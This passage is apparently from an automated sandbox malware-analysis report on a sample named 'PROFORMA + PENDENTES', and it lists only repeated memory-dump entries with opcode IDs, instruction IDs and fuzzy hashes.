                                              • Opcode Fuzzy Hash: b11c620c7baeb146a988b2c09458b452cf01dd41d126342eb3878346135993ed
                                              • Instruction Fuzzy Hash: 1D11E2B58003499FDB10DF9AC885BDEFBF8EB49320F10841AE558A7600C3B9A944CFA5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1483349580.0000000000B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B1D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b1d000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c95f2d30b6d9b138beafb29cb5ea1cd76a84a0315a1815525fdc1d477283ce7c
                                              • Instruction ID: 9488801c35f0bf0ef234ccc86dc28160eb77082616c58c161e48342e7ecf5ddf
                                              • Opcode Fuzzy Hash: c95f2d30b6d9b138beafb29cb5ea1cd76a84a0315a1815525fdc1d477283ce7c
                                              • Instruction Fuzzy Hash: 9E2103B2504344DFDB15DF50D8C0B66BBA5FB88310F60C6A9E8190B256C33AD896CBA2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1483390175.0000000000B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B2D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b2d000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1a398d5db9934b9a2eade56c967e0396e8acb2488149ee64ff1ae6ceb54ac52c
                                              • Instruction ID: 882e2136b0a02aa7ac93a639818de1d76969dae5384ae86cd8c1f31a84baeea0
                                              • Opcode Fuzzy Hash: 1a398d5db9934b9a2eade56c967e0396e8acb2488149ee64ff1ae6ceb54ac52c
                                              • Instruction Fuzzy Hash: 4D21D071604344DFDB14DF10E9D4B17BBA5FB88314F20C5A9D84E4B2A6C33AD847CA62
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1483390175.0000000000B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B2D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b2d000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a6ca772ab06d6ba1bff82bd026fd0d0ca0d8f168e1a76bcc7d3ecfd77d456046
                                              • Instruction ID: ccae7a65204ce587c352fd9f68c608c32ec2aadd88349b0e902ac3b70704eafc
                                              • Opcode Fuzzy Hash: a6ca772ab06d6ba1bff82bd026fd0d0ca0d8f168e1a76bcc7d3ecfd77d456046
                                              • Instruction Fuzzy Hash: 9E2104B1604344EFDB04DF50E9C0B16BBA5FB98314F20C6ADD80D4B296C33AD846CAA2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1483390175.0000000000B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B2D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b2d000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9232d76c02d9b246c69571c102c7fecc6112cb5ab87225d528af64ff640ca29d
                                              • Instruction ID: 61d12ec145a8a9b2bfa0ccfdebd4b39fb1800f53fb012bc1c64d8289ca8dfe8e
                                              • Opcode Fuzzy Hash: 9232d76c02d9b246c69571c102c7fecc6112cb5ab87225d528af64ff640ca29d
                                              • Instruction Fuzzy Hash: 812162755083809FCB12CF14D994B16BFB1EB46314F28C5DAD8498F2A7C33A985ACB62
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1483349580.0000000000B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B1D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b1d000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 788e04879303f038a4119c50adcc9150c8354023de2962495192c323b19cba65
                                              • Instruction ID: 5f1ef90e38b00a2b8d133bc807d86b5ff877be82cfbacbd142c13dfd7fcfd449
                                              • Opcode Fuzzy Hash: 788e04879303f038a4119c50adcc9150c8354023de2962495192c323b19cba65
                                              • Instruction Fuzzy Hash: 2021B176504240DFCB16CF50D9C4B56BFB2FB84314F24C6A9DC494B656C33AD86ACBA1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1483390175.0000000000B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B2D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b2d000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dd2c54e641c636489e18f71c5e932094e1140b5f592d34fffac0146327057262
                                              • Instruction ID: 9688cd2ef5ccdb5c93cd8f6ee85cf6abdc3a7e219e511400a7232bf92e545c8c
                                              • Opcode Fuzzy Hash: dd2c54e641c636489e18f71c5e932094e1140b5f592d34fffac0146327057262
                                              • Instruction Fuzzy Hash: 31118B75504284DFCB05CF50E5C4B15BBA2FB84314F24C6A9D84D4B656C33AD84ACBA1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1483349580.0000000000B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B1D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b1d000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7914367857341ce1816bd741e249ec04aca57ebb93f0d5741f1bcf490293812c
                                              • Instruction ID: ccfdfbb8b83a43616230825e01accaba96c5e6f0bd7ad1e40e00d32c2f7519ae
                                              • Opcode Fuzzy Hash: 7914367857341ce1816bd741e249ec04aca57ebb93f0d5741f1bcf490293812c
                                              • Instruction Fuzzy Hash: 1E01DB711043449FE7104B15DDC4BA7FBE8EF81720F58C59AED094A2C6C3799C80CAB5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1483349580.0000000000B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B1D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b1d000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 98c7f944b51cf6abe1a491d92c769dce636d60d9d8df8cddafa24de0149b2453
                                              • Instruction ID: e39892da023f25d32ba1d51c39840d7f727dae1c5d70b400f25b2437a14bf397
                                              • Opcode Fuzzy Hash: 98c7f944b51cf6abe1a491d92c769dce636d60d9d8df8cddafa24de0149b2453
                                              • Instruction Fuzzy Hash: 6EF096714043449FE7208A16DD84BA6FFE8EF91734F18C55AED085B2C6C379AC44CAB5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 76c8fcc55ddf23b62a08e9ad42ae1ef0ad537b9ba953e93de78e1f91c5594310
                                              • Instruction ID: 96582cd630ffb70160b3870719deab6ac69c7710f0ee2236b95894822f4959fa
                                              • Opcode Fuzzy Hash: 76c8fcc55ddf23b62a08e9ad42ae1ef0ad537b9ba953e93de78e1f91c5594310
                                              • Instruction Fuzzy Hash: D0E1F774E102598FDB18DFA9D580AAEFBB2FF89305F248169D414AB355D730AD42CFA0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 32ca61a5021ba3f2cbe670d643f4cc1ce89380e7eaaf5fba2df234ed34c7f240
                                              • Instruction ID: 27a797d16e808650f65ac7a70252b7d0fc83f6dfa6fa6879882079dd31fc614b
                                              • Opcode Fuzzy Hash: 32ca61a5021ba3f2cbe670d643f4cc1ce89380e7eaaf5fba2df234ed34c7f240
                                              • Instruction Fuzzy Hash: C8E10874E102598FDB18DFA8D580AAEFBB2FF89305F24C169D414AB355D730A942CFA0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 86960d09a8cf6f42a71a1b3cd03f059dd8729e18a8dd6600e7b12bdcd79bc42e
                                              • Instruction ID: 93986d3e67ba6832c1b53e28f1da1f1ea9a7965d0239f1b2bf1c2963989d8b03
                                              • Opcode Fuzzy Hash: 86960d09a8cf6f42a71a1b3cd03f059dd8729e18a8dd6600e7b12bdcd79bc42e
                                              • Instruction Fuzzy Hash: F8E11974E102598FDB14DFA8D580AAEFBB2FF89314F24C169D414AB359D734A942CFA0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5388de31bd74e4cbbc0fc573651494961147335192924697044b4988037bd620
                                              • Instruction ID: d714455f14721eec8608eec61cc2c085e9c8d6892a48d0af0545860bcc19c53e
                                              • Opcode Fuzzy Hash: 5388de31bd74e4cbbc0fc573651494961147335192924697044b4988037bd620
                                              • Instruction Fuzzy Hash: BAE11874E102598FDB14DFA8D580AAEFBB2FF89304F248169D414AB359D731AD42CFA0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9f6d2427ec39f222965e894f18c1cfd2a7a079786524276dbf9984759da5d816
                                              • Instruction ID: 13b1b9a99347bb58b868c035b55e9118ea745810a975a24046c99bc6d3e3f042
                                              • Opcode Fuzzy Hash: 9f6d2427ec39f222965e894f18c1cfd2a7a079786524276dbf9984759da5d816
                                              • Instruction Fuzzy Hash: 02E10974E102598FDB18DFA9D9809AEFBB2FF89304F248169D414AB355D731A942CFA0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d93e7034fef9160284e59b8eb581d2eb80d9840bdca39ecf74a8dc4dfa9f9988
                                              • Instruction ID: 46f9270de55cac725d1e280c698fcbffa9f0469d5ff593726f98e3308be7ae6a
                                              • Opcode Fuzzy Hash: d93e7034fef9160284e59b8eb581d2eb80d9840bdca39ecf74a8dc4dfa9f9988
                                              • Instruction Fuzzy Hash: 17D1E43192065A8ACB15EB64D890BDDF7B1FF96300F50CB9AE50A37210EF706AC5CB91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6da40ac2117f309b92f9dfc7306b16b4a72f05710b3f1009f4b588bb78c94e39
                                              • Instruction ID: da9d58b61282f232220cc01ec35c7e26609dbe9a5319b4ea306a95b5a9b3d91d
                                              • Opcode Fuzzy Hash: 6da40ac2117f309b92f9dfc7306b16b4a72f05710b3f1009f4b588bb78c94e39
                                              • Instruction Fuzzy Hash: F4D1E431D2065A8ACB15EB64D990ADDF7B1FF96300F50CB9AE50A37210EF706AC5CB91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 055ef2ee15ee5bd21e55d124af59d72e470ff2a61ba97f1b6bc6f45cab0170e6
                                              • Instruction ID: ab3f125401df60dd3161a19b97313e0faa44d658f9351e2b364661bafe8d2135
                                              • Opcode Fuzzy Hash: 055ef2ee15ee5bd21e55d124af59d72e470ff2a61ba97f1b6bc6f45cab0170e6
                                              • Instruction Fuzzy Hash: 39516D70E102198FDB18DFA9D5805AEFBF2BF89304F24C16AD418B7256C7319A42CFA1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5a2cca188708db003181ad71e9e52bea436d29a2207382032f1708d12782a466
                                              • Instruction ID: c19cb9744fab67dc4a557d0dae2c86423d1c11640285e11a17986b964f8ab0fe
                                              • Opcode Fuzzy Hash: 5a2cca188708db003181ad71e9e52bea436d29a2207382032f1708d12782a466
                                              • Instruction Fuzzy Hash: BA511B74E102198FDB18DFA9D9805AEBBF2AF89304F24C16AD418AB355D7319942CFA1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 40f0821499f832e651ddc48cd3ea40dd0db6c0e1769f8ae61c6bb68731f58c2d
                                              • Instruction ID: 69f650f160b0a1ef9781455559372db981657e5ac7c2ab87c899a0257e3fb0f1
                                              • Opcode Fuzzy Hash: 40f0821499f832e651ddc48cd3ea40dd0db6c0e1769f8ae61c6bb68731f58c2d
                                              • Instruction Fuzzy Hash: F0511A70E102198FDB18DFA9C9805AEFBF2BF89314F24C16AD418AB355D7309942CFA0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1493042073.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7080000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cb766ca5cb73f8bd284aad1bc20f0b0c20cf37036939b8274c376436116c1b84
                                              • Instruction ID: b8ec87baf95c2ea3de00ce8f3e6d32d92d2971104aeb00bfb763611f084203f7
                                              • Opcode Fuzzy Hash: cb766ca5cb73f8bd284aad1bc20f0b0c20cf37036939b8274c376436116c1b84
                                              • Instruction Fuzzy Hash: 2C313EB1D0A3948FEB59CF67C8043D9BFB76F86210F08C1EBC449AA266D6350989CF51
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 893257787643f68763723f0040ca78bb8362ed5b0de14fb1b435631900ed7b27
                                              • Instruction ID: a3df7bfbc2aac6035a3b53e0c1313f8f0558cdad7fbe0a230e833ecf45f75593
                                              • Opcode Fuzzy Hash: 893257787643f68763723f0040ca78bb8362ed5b0de14fb1b435631900ed7b27
                                              • Instruction Fuzzy Hash: 0E828E71A04209CFCB15CF68C884AAEBBF2FF88310F258559E9199B2B1D774ED81DB51
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4ba728a93c36d61316d3fe694400d75bcaa18bccf9f2e19580eb32f78b036a40
                                              • Instruction ID: 2231a58ae9a9c893749e0375a1947880e3770a0b1f927abd8bf88de4a974b577
                                              • Opcode Fuzzy Hash: 4ba728a93c36d61316d3fe694400d75bcaa18bccf9f2e19580eb32f78b036a40
                                              • Instruction Fuzzy Hash: 45128F71A002189FDB14DFA9C854BAEBBB6FF88314F248529E505EB3A1DF349D81DB50
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2eaecfada330979bf10b00e91ff33b46278e684fa7c6638cbf403b16f81dc748
                                              • Instruction ID: a035a9f072cc41a0333fc850340a22a96267dc3c8cc4f9929a3cce3c6c8be814
                                              • Opcode Fuzzy Hash: 2eaecfada330979bf10b00e91ff33b46278e684fa7c6638cbf403b16f81dc748
                                              • Instruction Fuzzy Hash: 0C022A71A002199FCB14CFA9C984ABDBBB2EF88315F158069EA45EB271DB34DD41EB50
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9fa1f62a12b669472d54d7b58a8b6ecc96f9c0de42c3ab9cf3b13c67417581ef
                                              • Instruction ID: 82c408467b18b3146d1f110ddcc6fe99ce6a8b302f88dc7dbc4cc5707a4fd74d
                                              • Opcode Fuzzy Hash: 9fa1f62a12b669472d54d7b58a8b6ecc96f9c0de42c3ab9cf3b13c67417581ef
                                              • Instruction Fuzzy Hash: 7BE1FA75E00658CFDB14DFA9C984AADBBB1FF49310F1580A9E919AB362D730AC41DF50
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 31041ea6fb9b38cf69b33947300ac8a3ca8d6f4f0518ccee6ea70607d86377f4
                                              • Instruction ID: 762929e2b52d52426edd1624b083a4a5d847ddd80a6b4cb3608d4d3b91491637
                                              • Opcode Fuzzy Hash: 31041ea6fb9b38cf69b33947300ac8a3ca8d6f4f0518ccee6ea70607d86377f4
                                              • Instruction Fuzzy Hash: B491F775E0021CCFDB14DFA9D984AADBBF2BF89310F248069E509AB365DB349942DF50
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3e6af5e550566f1fa16543825994925d4eef73a37150de6b440a6a42ccd583b2
                                              • Instruction ID: 94f2dcb46e6d77627d18f46715f381d64892258b2c939dabce0c611dac9996ed
                                              • Opcode Fuzzy Hash: 3e6af5e550566f1fa16543825994925d4eef73a37150de6b440a6a42ccd583b2
                                              • Instruction Fuzzy Hash: 4E91D274E00258CFDB18DFA9C884AADBBF2BF89310F2480A9D559AB365DB349D41DF11
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4821a92edcb85ee2bbcb58c70b4325790607b99016c8686301123c1768e07cbc
                                              • Instruction ID: 51ec9fef4e68a4ea308560c01583aa1bb4b1a791a5f40171e900568ea2f2567c
                                              • Opcode Fuzzy Hash: 4821a92edcb85ee2bbcb58c70b4325790607b99016c8686301123c1768e07cbc
                                              • Instruction Fuzzy Hash: 3C91F375E0021CCFDB14DFA9D984AADBBF2BF89310F248069E919AB365DB309941DF50
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b5f639fce9c6a299cf60b6e4b4f30cdd5e1d8cfa6eef8bd45f989c7b687c14af
                                              • Instruction ID: 963ac3d37a47c9834bfe9823acd234fe6a51e286f2d3e9332d330cabfe0ed961
                                              • Opcode Fuzzy Hash: b5f639fce9c6a299cf60b6e4b4f30cdd5e1d8cfa6eef8bd45f989c7b687c14af
                                              • Instruction Fuzzy Hash: BB91D375E0021C8FDB14DFAAD984AADBBF2BF88310F248069E509AB365DB349945DF50
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 22ce154ea212ebd5a874d9adbde85f78b1dc72f310cef54ccb75468db1be9173
                                              • Instruction ID: 66788db8375a00b076ac572285d3dd314e2b8cfea7eb1a0183fa0d60417f6899
                                              • Opcode Fuzzy Hash: 22ce154ea212ebd5a874d9adbde85f78b1dc72f310cef54ccb75468db1be9173
                                              • Instruction Fuzzy Hash: 52810574E0021CCFDB18DFA9D984AADBBF2BF89310F248069E509AB365DB709941DF50
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 537a42d4b97db1142604820858224fb01794efff9190006b59f1a9282ff74fe2
                                              • Instruction ID: 5a04b05b83399b59fccb90ace4d57d041fd1308bae324cba5c71fc0930d29421
                                              • Opcode Fuzzy Hash: 537a42d4b97db1142604820858224fb01794efff9190006b59f1a9282ff74fe2
                                              • Instruction Fuzzy Hash: 3681D674E00258CFDB18DFA9D884AAEBBF2BF89310F14C069D919AB365DB749941DF10
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5493a8b323df67a06949f2144e5e670504f03a75288d6cc2952cf75d6874dcfd
                                              • Instruction ID: 479cc02e0c082b5fba81f561adfc00805c8c532872e9075e6336a81e65c3be30
                                              • Opcode Fuzzy Hash: 5493a8b323df67a06949f2144e5e670504f03a75288d6cc2952cf75d6874dcfd
                                              • Instruction Fuzzy Hash: 7381D574E0025CCFDB18DFA9D994AADBBF2BF88310F148069E509AB365DB349941DF50
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 28a43b86160241a0ed66baaec7a31034b0cfc39ba293a2c0e32d9eae301dd7e3
                                              • Instruction ID: 2eaf6fb7dd16cf447b2bd7bdc8c90d2969e9dcfba7562605dbf7736cb8ec8ab5
                                              • Opcode Fuzzy Hash: 28a43b86160241a0ed66baaec7a31034b0cfc39ba293a2c0e32d9eae301dd7e3
                                              • Instruction Fuzzy Hash: 7961F775E00248CFDB18DFAAD984AADBBF2BF89310F14C069E918AB365DB345941DF00
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 77fa6c659d82f919a30aa58813aab789f546b68b5c67c9b91614099304284e2c
                                              • Instruction ID: 824c0ebd7491df27ce42b0d66c51fdc3031b1b071fd157b1889819d65dce50a3
                                              • Opcode Fuzzy Hash: 77fa6c659d82f919a30aa58813aab789f546b68b5c67c9b91614099304284e2c
                                              • Instruction Fuzzy Hash: 7F522F74A0021C8FEB149BA4CC60BAEBB72FF89300F5084A9D50A6B365DF395E85DF55
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e0d4f1e9979b4326d7a807da7a99722f95e1148d17176c18a140c2d07eee0114
                                              • Instruction ID: 10c0f7ee5295a92bc61bc4295b6a014928b5502db2311e586774fce28128402e
                                              • Opcode Fuzzy Hash: e0d4f1e9979b4326d7a807da7a99722f95e1148d17176c18a140c2d07eee0114
                                              • Instruction Fuzzy Hash: C6F180717042098FDB259A29C854B397796EFD5B90F1440AAE702CF3B1EF68CC82E751
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7d4d9a19a60ca716c9faddeb3859e9b818f83405f5f244f301cf9fe24f0b4f33
                                              • Instruction ID: 2f460b52184d2be153ddadfab713296953c4621a0f79838e0281686dc0c68322
                                              • Opcode Fuzzy Hash: 7d4d9a19a60ca716c9faddeb3859e9b818f83405f5f244f301cf9fe24f0b4f33
                                              • Instruction Fuzzy Hash: 03124B30A042499FCB25DFA8D884AAEBBF2FF88714F158599E905DB271DB30ED41DB50
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3f4977df1c0da2fd31986a846b73199a5f015a9a4aa4d33bad0d472b8cfc3af9
                                              • Instruction ID: 7b0a41e0f5b7525cdee5e7794c3c3c318dba5543aed3161c2d6645c4d1d00b55
                                              • Opcode Fuzzy Hash: 3f4977df1c0da2fd31986a846b73199a5f015a9a4aa4d33bad0d472b8cfc3af9
                                              • Instruction Fuzzy Hash: 2EF1FCB5A002198FCB14CFA9C9849ADB7F6FF88320B1A8059E619AB371C735EC41DB51
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
